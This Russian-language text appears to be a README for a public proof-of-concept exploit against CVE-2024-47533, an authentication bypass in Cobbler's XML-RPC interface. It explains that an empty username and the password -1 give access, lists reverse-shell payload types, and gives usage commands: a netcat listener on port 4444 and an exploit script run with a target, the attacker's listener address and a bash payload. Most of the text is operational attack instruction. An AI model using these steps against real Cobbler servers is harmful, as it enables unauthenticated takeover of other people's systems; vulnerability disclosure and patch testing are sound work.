
CVE-2024-47533 — это критическая уязвимость обхода аутентификации в Cobbler (версии с 3.0.0 до 3.2.3 и 3.3.7), позволяющая неаутентифицированное удалённое выполнение кода через интерфейс XMLRPC.
⚠️ Критическое удалённое выполнение кода через обход аутентификации в Cobbler
🛠️ PoC-реализация от @dollarboysushil
Cobbler — сервер установки Linux, который обеспечивает быструю настройку сред сетевой установки, имеет уязвимость аутентификации в версиях с 3.0.0 до (не включая) 3.2.3 и 3.3.7. Функция utils.get_shared_secret() всегда возвращает -1, что позволяет любому подключиться к XML-RPC интерфейсу Cobbler с пустым именем пользователя ('') и паролем -1. Это позволяет атакующему, имеющему сетевой доступ, получить полный контроль над сервером Cobbler. Уязвимость исправлена в версиях 3.2.3 и 3.3.7.
Уязвимость вызвана некорректной обработкой общего секрета в функции utils.get_shared_secret(), которая всегда возвращает -1, фактически обходя аутентификацию. Это позволяет любому сетевому пользователю подключаться к XMLRPC-интерфейсу Cobbler с пустыми учётными данными и выполнять произвольные команды.
http://<target>:25151/ — конечная точка XMLRPC API Cobbler
Скрипт эксплойта поддерживает различные полезные нагрузки reverse shell, включая:
nc, nc2)Запустите слушатель Netcat на вашей машине:
nc -lvnp 4444

Запустите скрипт эксплойта CVE-2024-47533-dbs.py.
python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

При успешном выполнении обратный shell подключится к слушателю, предоставляя атакующему удалённый доступ к серверу.
